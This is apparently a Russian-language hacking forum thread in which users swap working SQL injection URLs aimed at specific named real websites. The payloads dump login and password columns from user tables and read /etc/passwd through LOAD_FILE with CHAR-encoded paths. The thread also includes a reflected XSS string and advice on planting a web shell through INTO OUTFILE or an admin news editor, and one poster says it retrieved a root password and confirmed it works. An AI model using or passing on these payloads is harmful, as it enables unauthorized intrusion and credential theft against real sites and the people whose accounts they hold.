smroqt?lnb`kg ... И еще неизвестно сколько будет дальше... После 16го символа пошли одни нули.... Тоесть я > поменял на = так можно? Это значит что всего 16 символов? smroqt?lnb`kgnrs Вот что вышло, и что это такое я сбрутил? Куда это совать?) И еще если я сбрутил из version() первые три символа 4-0 значит ли это что версия 4.0?
вопросег. есть ли тут[http://www.lipetsk.ru/sites/catalogue.html?category=-1+union+select+1,2,3,4,5,6,7,8/*] SQl-ing ? и как раскрутить? поля подбирал с помощью "order by". ошибку не показывает но догадоццо что она есть можна. и ещё. если сделать так http://www.lipetsk.ru/sites/catalogue.html?category=-1+'><script>alert('XSS')</script><' то будут пасив xss
mr.The Первый параметр выводится в href а-тега. Чтобы каждый раз не искать результат в сурсе страницы, можно закрывать тег из самой инъекции. Code: http://www.lipetsk.ru/sites/catalogue.html?pass=1&backurl=/sites/catalogue.html&category=null+union+select+concat('\'>',table_schema,'.',table_name,'<a '),0,0,0,0,0,0,0+from+information_schema.tables/* http://www.lipetsk.ru/sites/catalogue.html?pass=1&backurl=/sites/catalogue.html&category=null+union+select+concat('\'>',login,':',password,'<a '),0,0,0,0,0,0,0+from+www2.auth_users/*
http://www.ksu.ru/f16/index.php?id=10&idm=0'&id_news=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11/* Выводит имя базы, пользователя и версию. Подобрать названия таблиц что-то не получается. Что можете посоветовать кроме XSS?
Да ничего не могу, единственное вот страница админа - http://www.ksu.ru/archeol/ceramics/index.phtml?flag=1&k=0 попробуй подобрать что-нибудь... А так там ЛОАД_ФАЙЛ не работает, разве что попробуй шелл залить через into outfile, только надо подобрать хотябы одну таблицу, любую...
Подскажите, что дальше делать? http://www.nap.edu/topics.php?topic=350+union+select+1,2,3,4,5,6,7,8,9,10,11
http://www.nap.edu/topics.php?topic=-350+union+select+1,2,LOAD_FILE(CHAR(46,46,47,46,46,47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7,8,9,10,11/* и тд.. ftpusers syslog.conf
тут на ачате полно статей о скулях и о лоад_файл http://forum.antichat.ru/thread19844.html http://forum.antichat.ru/showthread.php?p=407222#post407222 еще тут http://injection.rulezz.ru/ а вообще поиск)))
добавлю, кодировать можно тут -> _http://h4k.in/encoding/index.php вставляешь нужный текст, выбираешь способ кодирования, например, to SQL HEX()
Подскажите что делать дальше _http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,4,5,6,7/* Читал мануалы, но немогу угадать название базы.
Вначале определяем версию. http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,version(),5,6,7/* Ура 5 мускул! Дальше проще.... http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,table_name,5,6,7%20from%20information_schema.tables%20limit%200,1/* limit 1,1 , limit 2,1 ... и т.д. Исследуем структуру базы.... дальше по обстоятельствам.
Мэн поясни поподробней плиз, что теперь мне это даёт и как сформировать запрос на userass. 0 - CHARACTER_SETS 1 - COLLATIONS 3 - COLUMNS 4 - COLUMN_PRIVILEGES 5 - KEY_COLUMN_USAGE 6 - PROFILING 7 - ROUTINES 8 - SCHEMATA 9 - SCHEMA_PRIVILEGES 10 - STATISTICS 11 - TABLES 12 - TABLE_CONSTRAINTS 13 - TABLE_PRIVILEGES 14 - TRIGGERS 15 - USER_PRIVILEGES 16 - VIEWS 17 - banners 18 - contacts 19 - djs 20 - gen_sets
Все лежит в таблице gen_sets тама есть нужные тебе поля login и password нужный тебе юзер в данном случае - root пароль - найди сам , а то ведь так не интересно. И еще тебе нужно найти куда это подставить. З.Ы. Я нашел и проверил. Работает. З.З.Ы. И еще.... почитай мануалы внимательней, а то ты писал что читаешь....
есть жоступ к админке, но могу только добавлять новости\статьи. при этом ничего не фильтруется. можно как-нибудь залить шелл?
Ну ты б поподробнее описал все: мож эта известная цмска, есть ли возможность заливать картинки или прекреплять файлы и т.д.
http://www.0629.com.ua/view_news.php?id_news= Прописываю: http://www.0629.com.ua/view_news.php?id_news=http://mail.ru Пишет: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://mail.ru' at line 1 Можно ли как нибудь загрузить шелл?
